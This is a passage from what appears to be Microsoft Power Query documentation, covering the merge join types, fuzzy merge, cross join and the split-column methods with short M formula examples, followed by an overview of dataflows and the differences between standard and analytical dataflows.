the right table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the left outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table as long as the CountryID exists in the
Countries table. If there are no matches between the left and right tables, a null value is
the result of the merge for that row. In the following image, this is shown to be the case
for CountryID 4, which was brought in from the Sales table.

To do a left outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Left outer.
6. Select OK.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Right outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a right outer
join, which keeps all the rows from the right table and brings in any matching rows from
the left table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the right outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. The CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.

In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the right outer join works,
all rows from the right table will be brought in, but only matching rows from the left
table will be kept.

To do a right outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Right outer.
6. Select OK.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Full outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a full outer
join, which brings in all the rows from both the left and right tables. More information:
Merge operations overview

This article uses sample data to show how to do a merge operation with the full outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the full outer join works, all
rows from both the left and right tables will be brought in, regardless of whether they
only appear in one of the tables.

To perform a full outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Full outer.
6. Select OK
7 Note

You can merge on more than one column by selecting and holding Ctrl and then
selecting the columns.

 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 4 of 4 rows from the first table, and 3 of 4 rows from the second
table." This message is crucial for understanding the result that you get from this
operation.
In the Countries table, you have the Country Spain with id of 4, but there are no records
for CountryID 4 in the Sales table. That's why only three of four rows from the right
table found a match. All rows from the right table that didn't have matching rows from
the left table will be grouped and shown in a new row in the output table with no values
for the fields from the left table.

From the newly created Countries column after the merge operation, expand the
Country field. Don't select the Use original column name as prefix check box.

After performing this operation, you'll create a table that looks like the following image.
Inner join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is an inner join,
which brings in only matching rows from both the left and right tables. More
information: Merge operations overview

This article uses sample data to show how to do a merge operation with the inner join.
The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the inner join works, only
matching rows from both the left and right tables will be brought in.

To perform an inner join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Inner.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 1 of 4 rows from the first table, and 1 of 2 rows from the second
table." This message is crucial to understanding the result that you get from this
operation.

In the Sales table, you have a CountryID of 1 and 2, but neither of these values is
found in the Countries table. That's why the match found only one of four rows in the
left (first) table.

In the Countries table, you have the Country Spain with the id 4, but there are no
records for a CountryID of 4 in the Sales table. That's why only one of two rows from
the right (second) table found a match.

From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.

After performing this operation, you'll create a table that looks like the following image.
Left anti join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a left anti join,
which brings in only rows from the left table that don't have any matching rows from
the right table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the left anti
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where only the rows from the left table
that don't match any from the right table are kept.

To do a left anti join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Left anti.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 4 rows from the first table." This message is crucial to
understanding the result that you get from this operation.

In the Sales table, you have a CountryID of 1 and 2, but neither of them is found in the
Countries table. That's why the match found only one of four rows in the left (first) table.

In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.

After doing this operation, you'll create a table that looks like the following image. The
newly expanded Country field doesn't have any values. That's because the left anti join
doesn't bring any values from the right table—it only keeps rows from the left table.
Right anti join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a right anti
join, which brings in only rows from the right table that don't have any matching rows
from the left table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the right anti
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where only the rows from the right table
that don't match any from the left table are kept. As a common use case, you can find
all the rows that are available in the right table but aren't found in the left table.

To do a right anti join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Right anti.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 2 rows from the second table." This message is crucial to
understanding the result that you get from this operation.

In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match. Because of how the right anti join works, you'll never
see any rows from the left (first) table in the output of this operation.

From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
The newly expanded Country field doesn't have any values. That's because the right anti
join doesn't bring any values from the left table—it only keeps rows from the right table.
Fuzzy merge
Article • 12/17/2022

Fuzzy merge is a smart data preparation feature you can use to apply fuzzy matching
algorithms when comparing columns, to try to find matches across the tables that are
being merged.

You can enable fuzzy matching at the bottom of the Merge dialog box by selecting the
Use fuzzy matching to perform the merge option button. More information: Merge
operations overview

7 Note

Fuzzy matching is only supported on merge operations over text columns. Power
Query uses the Jaccard similarity algorithm to measure the similarity between pairs
of instances.

Sample scenario
A common use case for fuzzy matching is with freeform text fields, such as in a survey.
For this article, the sample table was taken directly from an online survey sent to a
group with only one question: What is your favorite fruit?

The results of that survey are shown in the following image.


The nine records reflect the survey submissions. The problem with the survey
submissions is that some have typos, some are plural, some are singular, some are
uppercase, and some are lowercase.

To help standardize these values, in this example you have a Fruits reference table.

7 Note
For simplicity, this Fruits reference table only includes the name of the fruits that
will be needed for this scenario. Your reference table can have as many rows as you
need.

The goal is to create a table like the following, where you've standardized all these
values so you can do more analysis.

Fuzzy merge operation


To do the fuzzy merge, you start by doing a merge. In this case, you'll use a left outer
join, where the left table is the one from the survey and the right table is the Fruits
reference table. At the bottom of the dialog box, select the Use fuzzy matching to
perform the merge check box.
After you select OK, you can see a new column in your table because of this merge
operation. If you expand it, you'll notice that there's one row that doesn't have any
values in it. That's exactly what the dialog box message in the previous image stated
when it said "The selection matches 8 of 9 rows from the first table."
Fuzzy matching options
You can modify the Fuzzy matching options to tweak how the approximate match
should be done. First, select the Merge queries command, and then in the Merge dialog
box, expand Fuzzy matching options.
The available options are:

Similarity threshold (optional): A value between 0.00 and 1.00 that provides the
ability to match records above a given similarity score. A threshold of 1.00 is the
same as specifying an exact match criteria. For example, Grapes matches with
Graes (missing the letter p) only if the threshold is set to less than 0.90. By default,
this value is set to 0.80.
Ignore case: Allows matching records no matter what the case of the text.
Match by combining text parts: Allows combining text parts to find matches. For
example, Micro soft is matched with Microsoft if this option is enabled.
Show similarity scores: Shows similarity scores between the input and the matches
values after fuzzy matching.
Number of matches (optional): Specifies the maximum number of matching rows
that can be returned for every input row.
Transformation table (optional): Allows matching records based on custom value
mappings. For example, Grapes is matched with Raisins if a transformation table is
provided where the From column contains Grapes and the To column contains
Raisins.
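
In M, a fuzzy merge is written with the Table.FuzzyNestedJoin function, which accepts an option record that corresponds to the settings above. The following is a sketch only: the query and column names (Survey, Fruit, Fruits) are assumptions for this scenario, and you should verify the option field names, such as Threshold and IgnoreCase, against the function documentation in your environment.

Power Query M

= Table.FuzzyNestedJoin(
    Survey, {"Fruit"},
    Fruits, {"Fruit"},
    "Fruits",
    JoinKind.LeftOuter,
    [Threshold = 0.8, IgnoreCase = true])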

Transformation table
For the example in this article, you can use a transformation table to map the value that
has a missing pair. That value is apls, which needs to be mapped to Apple. Your
transformation table has two columns:

From contains the values to find.


To contains the values that will be used to replace the values found by using the
From column.

For this article, the transformation table will look as follows:

From To

apls Apple

You can go back to the Merge dialog box, and in Fuzzy matching options under
Number of matches, enter 1. Enable the Show similarity scores option, and then, under
Transformation table, select Transform Table from the drop-down menu.
After you select OK, you can go to the merge step. When you expand the column with
table values, you'll notice that besides the Fruit field you'll also see the Similarity score
field. Select both and expand them without adding a prefix.
After expanding these two fields, they'll be added to your table. Note the values you get
for the similarity scores of each value. These scores can help you with further
transformations if needed to determine if you should lower or raise your similarity
threshold.

For this example, the Similarity score serves only as additional information and isn't
needed in the output of this query, so you can remove it. Note how the example started
with nine distinct values, but after the fuzzy merge, there are only four distinct values.
Cross join
Article • 12/17/2022

A cross join is a type of join that returns the Cartesian product of rows from the tables in
the join. In other words, it combines each row from the first table with each row from
the second table.

This article demonstrates, with a practical example, how to do a cross join in Power
Query.

Sample input and output tables


For this example, the sample source tables are:

Product: A table with all the generic products that you sell.

Colors: A table with all the product variations, as colors, that you can have in your
inventory.

The goal is to perform a cross-join operation with these two tables to create a list of all
unique products that you can have in your inventory, as shown in the following table.
This operation is necessary because the Product table only contains the generic product
name, and doesn't give the level of detail you need to see what product variations (such
as color) there are.
Perform a cross join
To do a cross-join operation in Power Query, first go to the Product table. From the Add
column tab on the ribbon, select Custom column. More information: Add a custom
column

In the Custom column dialog box, enter whatever name you like in the New column
name box, and enter Colors in the Custom column formula box.
) Important

If your query name has spaces in it, such as Product Colors, the text that you need
to enter in the Custom column formula section has to follow the syntax #"Query
name". For Product Colors, you need to enter #"Product Colors".

You can check the name of your queries in the Query settings pane on the right
side of your screen or in the Queries pane on the left side.

After you select OK in the Custom column dialog box, a new column is added to the
table. In the new column heading, select Expand to expand the contents of this newly
created column, and then select OK.
After you select OK, you'll reach your goal of creating a table with all possible
combinations of Product and Colors.
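
Expressed in M, the whole cross join is a custom column that returns the Colors query on every row, followed by an expand step. This is a sketch, assuming the queries are named Product and Colors as above and that the color column inside the Colors query is named Color:

Power Query M

let
    // Add a column that holds the entire Colors table on every Product row
    #"Added Custom" = Table.AddColumn(Product, "Colors", each Colors),
    // Expand the nested table to get every product and color combination
    #"Expanded Colors" = Table.ExpandTableColumn(#"Added Custom", "Colors", {"Color"})
in
    #"Expanded Colors"
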
Split columns by delimiter
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by a delimiter.

Where to find Split Columns > By Delimiter


You can find the Split Columns: By Delimiter option in three places:

Home tab—under the Split column dropdown menu inside the Transform group.

Transform tab—under the Split column dropdown menu inside the Text column
group.

Right-click a column—inside the Split column option.


Split columns by delimiter into columns
In this example, the initial table will be the one shown in the image below, with only one
column for Accounts.
This column holds two values:

Account number
Account name

In this example, you want to split this column into two columns. The values are
delimited by a space—the first space from left to right. To do this split, select the
column, and then select the option to split the column by a delimiter. In Split Column
by Delimiter, apply the following configuration:

Select or enter delimiter: Space


Split at: Left-most delimiter
The result of that operation will give you a table with the two columns that you're
expecting.

7 Note

Power Query will split the column into as many columns as needed. The name of
the new columns will contain the same name as the original column. A suffix that
includes a dot and a number that represents the split sections of the original
column will be appended to the name of the new columns.
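
In M, this operation is generated as a Table.SplitColumn step that uses a splitter function. The following is a sketch of the left-most-delimiter split above, assuming the previous step is named Source:

Power Query M

= Table.SplitColumn(
    Source,
    "Accounts",
    // Split once, at the first (left-most) space
    Splitter.SplitTextByEachDelimiter({" "}, QuoteStyle.Csv, false),
    {"Accounts.1", "Accounts.2"})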

Split columns by delimiter into rows


In this example, your initial table will be the one shown in the image below, with the
columns Cost Center and Accounts.

The Accounts column has values in pairs separated by a comma. These pairs are
separated by a semicolon. The goal of this example is to split this column into new rows
by using the semicolon as the delimiter.

To do that split, select the Accounts column. Select the option to split the column by a
delimiter. In Split Column by Delimiter, apply the following configuration:

Select or enter delimiter: Semicolon


Split at: Each occurrence of the delimiter
Split into: Rows
The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.

Final Split
Your table still requires one last split column operation. You need to split the Accounts
column by the first comma that it finds. This split will create a column for the account
name and another one for the account number.

To do that split, select the Accounts column and then select Split Column > By
Delimiter. Inside the Split column window, apply the following configuration:

Select or enter delimiter: Comma


Split at: Each occurrence of the delimiter

The result of that operation will give you a table with the three columns that you're
expecting. You then rename the columns as follows:

Previous Name New Name

Accounts.1 Account Name

Accounts.2 Account Number

Your final table looks like the one in the following image.
Split columns by number of characters
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by the number of characters.

Where to find Split Columns > By Number of Characters


You can find the Split Columns > By Number of Characters option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by number of characters into
columns
The initial table for this example will be the one below, with only one column for
Column1.

This column holds three values:

Account Name—in the first six characters


Date—in the following eight characters with the format yyyymmdd
Units—the remaining characters

In this example, you want to split this column into three columns containing the values
described in the list above.
To do this split, select the column and then select the option to split the column by the
number of characters. In Split column by Number of Characters, apply the following
configuration:

Number of characters: 6
Split: Once, as far left as possible

The result of that operation will give you a table with two columns. One for the account
name and the other one that contains the combined values for the date and units.

7 Note

Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix containing a
dot and a number that represents the split section of the column will be appended
to the names of the new columns.

Now continue to do the same operation over the new Column1.2 column, but with the
following configuration:

Number of characters: 8
Split: Once, as far left as possible
The result of that operation will yield a table with three columns. Notice the new names
of the two columns on the far right. Column1.2.1 and Column1.2.2 were automatically
created by the split column operation.

You can now change the name of the columns and also define the data types of each
column as follows:

Original Column Name New Column name Data type

Column1.1 Account Name Text

Column1.2.1 Date Date

Column1.2.2 Units Whole Number

Your final table will look like the one in the following image.
Split columns by number of characters into
rows
The initial table for this example will be the one below, with the columns Group and
Account.

The Account column can hold multiple values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row.

To do that, select the Account column and then select the option to split the column by
the number of characters. In Split column by Number of Characters, apply the following
configuration:

Number of characters: 6
Split: Repeatedly
Split into: Rows

The result of that operation will give you a table with the same number of columns, but
many more rows because the fragments inside the original cell values in the Account
column are now split into multiple rows.
Split columns by positions
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by positions.

Where to find Split Columns > By Positions


You can find the Split Columns > By Positions option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by positions into columns
The initial table for this example will be the one shown in the image below, with only
one column for Column1.

This column holds three values:

Account Name—in the first six characters


Date—in the next eight characters with the format yyyymmdd
Units—the rest of the characters

In this example, you want to split this column into the three columns made from the
values in the list above. To do this split, select the column and then select the option to
split the column by positions. In Split Column by Positions, apply the following
configuration:
Positions: 0,6,14
Positions are zero-based and comma-separated, where position zero is the start
of the string.

7 Note

This operation will first start creating a column from position 0 to position 6, then
from position 7 to position 14. There will be another column should there be values
with a length of 16 or more characters in the current data preview contents.

The result of that operation will give you a table with three columns.

7 Note

Power Query will split the column into as many columns as the number of positions
provided. The name of the new columns will contain the same name as the original
column. A suffix created by a dot and a number that represents the split section of
the column will be appended to the name of the new columns.

You can now change the name of the columns, and also define the data types of each
column as follows:

Original Column Name New Column name Data type

Column1.1 Account Name Text


Column1.2 Date Date

Column1.3 Units Whole Number

Your final table will look like the one in the following image.
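
The same result can be produced in M with Table.SplitColumn and the Splitter.SplitTextByPositions function. A sketch, assuming the previous step is named Source; here the final column names are supplied directly instead of renaming them afterward:

Power Query M

= Table.SplitColumn(
    Source,
    "Column1",
    Splitter.SplitTextByPositions({0, 6, 14}),
    {"Account Name", "Date", "Units"})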

Split columns by positions into rows


The initial table for this example will be like the one in the image below, with the
columns Group and Account.

The Account column can only hold two values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row. To do that, select the
Account column and then select the option to split the column by positions. In Split
Column by Positions, apply the following configuration:

Positions: 0, 6
Split into: Rows
7 Note

This operation will first start creating a column from position 0 to position 6. There
will be another column should there be values with a length of 8 or more
characters in the current data preview contents.

The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.
Split columns by lowercase to uppercase
Article • 02/17/2023

In Power Query, you can split a column through different methods. If your data contains
CamelCased text or a similar pattern, the selected column(s) can easily be split by every
instance of the last lowercase letter to the next uppercase letter.

Where to find Split Columns > By Lowercase to Uppercase


You can find the Split Columns: By Lowercase to Uppercase option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by lowercase to uppercase into
columns
The initial table in this example will be the one shown in the image below, with one
column for Word and an extra column named Syllables. You'll only focus on the first
column.

This column holds two values in each row:

FirstWord—The first half of the compound word.


SecondWord—The second half of the compound word.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by lowercase to
uppercase.

This single column will split into multiple columns, given every instance of the last
lowercase letter to the next uppercase letter. In this case, it only splits into two columns.

Your final table will look like the following image.
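
Behind the scenes, this command uses the Splitter.SplitTextByCharacterTransition function, which splits wherever a character from the first set is immediately followed by a character from the second set. A sketch, assuming the previous step is named Source:

Power Query M

= Table.SplitColumn(
    Source,
    "Word",
    // Split where a lowercase letter is followed by an uppercase letter
    Splitter.SplitTextByCharacterTransition({"a".."z"}, {"A".."Z"}),
    {"Word.1", "Word.2"})

The uppercase-to-lowercase and digit-based splits described in the following articles use the same function with the character sets swapped or replaced by digit lists.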


Split columns by uppercase to lowercase
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of the last uppercase letter to the next
lowercase letter.

Where to find Split Columns > By Uppercase to Lowercase


You can find the Split Columns > By Uppercase to Lowercase option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by uppercase to lowercase into
columns
Your initial table in this example will be the one shown in the image below, with only
one column for Column1.

This column holds two values:

FirstWord—The first half of a product that is in camel case.


SecondWord—The second half of a product that is in camel case.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by uppercase to
lowercase.

This single column splits into multiple columns at every instance where an uppercase letter is followed by a lowercase letter. In this case, it only splits into two columns.

Your final table will look like the following image.


Split columns by digit to non-digit
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a digit followed by a non-digit.

Where to find Split Columns > By Digit to Non-Digit

You can find the Split Columns > By Digit to Non-Digit option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by digit to non-digit into
columns
The initial table in this example will be the one shown in the image below, with a column
for Pets and other extra columns. This example will only focus on the Pets column.

This column holds two values in each row:

Rank—The rank of the animal.


AnimalType—The type of animal, which is the second part of the value.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by digit to non-
digit.

This single column splits into multiple columns at every instance of a digit followed by a non-digit. In this case, it only splits into two columns.

Your final table will look like the following image.
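
The same character-transition splitter used for case-based splits also covers this scenario. The following is a minimal sketch under illustrative assumptions (sample data and column names are not from the original example).

```powerquery-m
// Minimal sketch: split "Pets" wherever a digit is followed by a non-digit
// (for example, "1Cat" -> "1" and "Cat").
let
    Source = Table.FromRecords({[Pets = "1Cat"], [Pets = "2Dog"]}),
    SplitPets = Table.SplitColumn(
        Source,
        "Pets",
        Splitter.SplitTextByCharacterTransition({"0".."9"}, (c) => not List.Contains({"0".."9"}, c)),
        {"Rank", "AnimalType"}
    )
in
    SplitPets
```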


Split columns by non-digit to digit
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a non-digit followed by a digit.

Where to find Split Columns > By Non-Digit to Digit

You can find the Split Columns > By Non-Digit to Digit option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by non-digit to digit into
columns
The initial table in this example will be the one shown in the image below, with a column
for Pets and other extra columns. In this example, you'll only focus on the Pets column.

This column holds two values in each row:

AnimalType—The first part is the type of animal.


Number—The number of the animal, indicating the order in which it came into the person's life.

In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by non-digit to
digit.

This single column splits into multiple columns at every instance of a non-digit followed by a digit. In this case, it only splits into two columns.

Your final table will look like the following image.


What are dataflows?
Article • 07/27/2023

 Tip

Try out Dataflow Gen2 in Data Factory in Microsoft Fabric, an all-in-one analytics
solution for enterprises. Microsoft Fabric covers everything from data movement to
data science, real-time analytics, business intelligence, and reporting. Learn how to
start a new trial for free!

Dataflows are a self-service, cloud-based, data preparation technology. Dataflows enable customers to ingest, transform, and load data into Microsoft Dataverse
environments, Power BI workspaces, or your organization's Azure Data Lake Storage
account. Dataflows are authored by using Power Query, a unified data connectivity and
preparation experience already featured in many Microsoft products, including Excel
and Power BI. Customers can trigger dataflows to run either on demand or automatically
on a schedule; data is always kept up to date.

Dataflows can be created in multiple Microsoft products
Dataflows are featured in multiple Microsoft products and don't require a dataflow-
specific license to be created or run. Dataflows are available in Power Apps, Power BI,
and Dynamics 365 Customer Insights. The ability to create and run dataflows is bundled
with those products' licenses. Dataflow features are mostly common across all products
they're featured in, but some product-specific features might exist in dataflows created
in one product versus another.

How does the dataflow function?


The previous image shows an overall view of how a dataflow is defined. A dataflow gets
data from different data sources (more than 80 data sources are supported already).
Then, based on the transformations configured with the Power Query authoring
experience, the dataflow transforms the data by using the dataflow engine. Finally, the
data is loaded to the output destination, which can be a Microsoft Power Platform
environment, a Power BI workspace, or the organization's Azure Data Lake Storage
account.

Dataflows run in the cloud


Dataflows are cloud-based. When a dataflow is authored and saved, its definition is
stored in the cloud. A dataflow also runs in the cloud. However, if a data source is on-
premises, an on-premises data gateway can be used to extract the data to the cloud.
When a dataflow run is triggered, the data transformation and computation happens in
the cloud, and the destination is always in the cloud.
Dataflows use a powerful transformation engine
Power Query is the data transformation engine used in the dataflow. This engine is
capable enough to support many advanced transformations. It also uses a
straightforward, yet powerful, graphical user interface called Power Query Editor. You
can use dataflows with this editor to develop your data integration solutions faster and
more easily.

Dataflow integration with Microsoft Power Platform and Dynamics 365
Because a dataflow stores the resulting entities in cloud-based storage, other services
can interact with the data produced by dataflows.
For example, Power BI, Power Apps, Power Automate, Power Virtual Agents, and
Dynamics 365 applications can get the data produced by the dataflow by connecting to
Dataverse, a Power Platform dataflow connector, or directly through the lake, depending
on the destination configured at dataflow creation time.

Benefits of dataflows
The following list highlights some of the benefits of using dataflows:

A dataflow decouples the data transformation layer from the modeling and
visualization layer in a Power BI solution.

The data transformation code can reside in a central location, a dataflow, rather
than be spread out among multiple artifacts.

A dataflow creator only needs Power Query skills. In an environment with multiple
creators, the dataflow creator can be part of a team that together builds the entire
BI solution or operational application.

A dataflow is product-agnostic. It's not a component of Power BI only; you can get
its data in other tools and services.

Dataflows take advantage of Power Query, a powerful, graphical, self-service data transformation experience.

Dataflows run entirely in the cloud. No additional infrastructure is required.


You have multiple options for starting to work with dataflows, using licenses for
Power Apps, Power BI, and Customer Insights.

Although dataflows are capable of advanced transformations, they're designed for self-service scenarios and require no IT or developer background.

Use-case scenarios for dataflows


You can use dataflows for many purposes. The following scenarios provide a few
examples of common use cases for dataflows.

Data migration from legacy systems


In this scenario, the decision has been made by an organization to use Power Apps for
the new user interface experience rather than the legacy on-premises system. Power
Apps, Power Automate, and AI Builder all use Dataverse as the primary data storage
system. The current data in the existing on-premises system can be migrated into
Dataverse by using a dataflow, and then these products can use that data.

Using dataflows to build a data warehouse


You can use dataflows as a replacement for other extract, transform, load (ETL) tools to
build a data warehouse. In this scenario, the data engineers of a company decide to use
dataflows to build their star schema–designed data warehouse, including fact and
dimension tables in Data Lake Storage. Then Power BI is used to generate reports and
dashboards by getting data from the dataflows.
Using dataflows to build a dimensional model
You can use dataflows as a replacement for other ETL tools to build a dimensional
model. For example, the data engineers of a company decide to use dataflows to build
the star-schema designed dimensional model, including fact and dimension tables in
Azure Data Lake Storage Gen2. Then Power BI is used to generate reports and
dashboards by getting data from the dataflows.

Centralize data preparation and reuse of datasets across multiple Power BI solutions
If multiple Power BI solutions are using the same transformed version of a table, the
process to create the table will be repeated multiple times. This increases the load on
the source system, consumes more resources, and creates duplicate data with multiple
points of failure. Instead, a single dataflow can be created to compute the data for all
solutions. Power BI can then reuse the result of the transformation in all solutions. The
dataflow, if used in such a way, can be part of a robust Power BI implementation
architecture that avoids the Power Query code duplicates and reduces the maintenance
costs of the data integration layer.

Next steps
The following articles provide further study materials for dataflows.

Create and use dataflows in Microsoft Power Platform

Creating and using dataflows in Power BI


Understanding the differences between
dataflow types
Article • 08/04/2023

Dataflows are used to extract, transform, and load data to a storage destination where it
can be leveraged for different scenarios. Because not all storage destinations share the
same characteristics, some dataflow features and behaviors differ depending on the
storage destination the dataflow loads data into. Before you create a dataflow, it's
important to understand how the data is going to be used, and choose the storage
destination according to the requirements of your solution.

Selecting a storage destination of a dataflow determines the dataflow's type. A dataflow that loads data into Dataverse tables is categorized as a standard dataflow. Dataflows that load data to analytical tables are categorized as analytical dataflows.

Dataflows created in Power BI are always analytical dataflows. Dataflows created in Power Apps can either be standard or analytical, depending on your selection when creating the dataflow.

Standard dataflows
A standard dataflow loads data to Dataverse tables. Standard dataflows can only be
created in Power Apps. One benefit of creating this type of dataflow is that any
application that depends on data in Dataverse can work with the data created by
standard dataflows. Typical applications that leverage Dataverse tables are Power Apps,
Power Automate, AI Builder and Power Virtual Agents.
Standard dataflows versions
We've been working on significant updates to standard dataflows to improve their
performance and reliability. These improvements will eventually be available to all
standard dataflows. But in the interim, we'll differentiate between existing standard
dataflows (version 1) and new standard dataflows (version 2) by adding a version
indicator in Power Apps.
Standard dataflow versions feature comparison
The following table lists the major feature differences between standard dataflows V1 and V2, and provides information about each feature's behavior in each version.

| Feature | Standard V1 | Standard V2 |
| --- | --- | --- |
| Maximum number of dataflows that can be saved with automatic schedule per customer tenant | 50 | Unlimited |
| Maximum number of records ingested per query/table | 500,000 | Unbounded. The maximum number of records that can be ingested per query or table now depends on Dataverse service protection limits at the time of ingestion. |
| Ingestion speed into Dataverse | Baseline performance | Improved performance by a few factors. Actual results may vary and depend on characteristics of the data ingested, and load on Dataverse service at the time of ingestion. |
| Incremental refresh policy | Not supported | Supported |
| Resiliency | When Dataverse service protection limits are encountered, a record will be retried up to 3 times. | When Dataverse service protection limits are encountered, a record will be retried up to 3 times. |
| Power Automate integration | Not supported | Supported |

Analytical dataflows
An analytical dataflow loads data to storage types optimized for analytics—Azure Data
Lake Storage. Microsoft Power Platform environments and Power BI workspaces provide
customers with a managed analytical storage location that's bundled with those product
licenses. In addition, customers can link their organization’s Azure Data Lake storage
account as a destination for dataflows.

Analytical dataflows are capable of additional analytical features, such as integration with Power BI's AI features or the use of computed entities, which are discussed later.
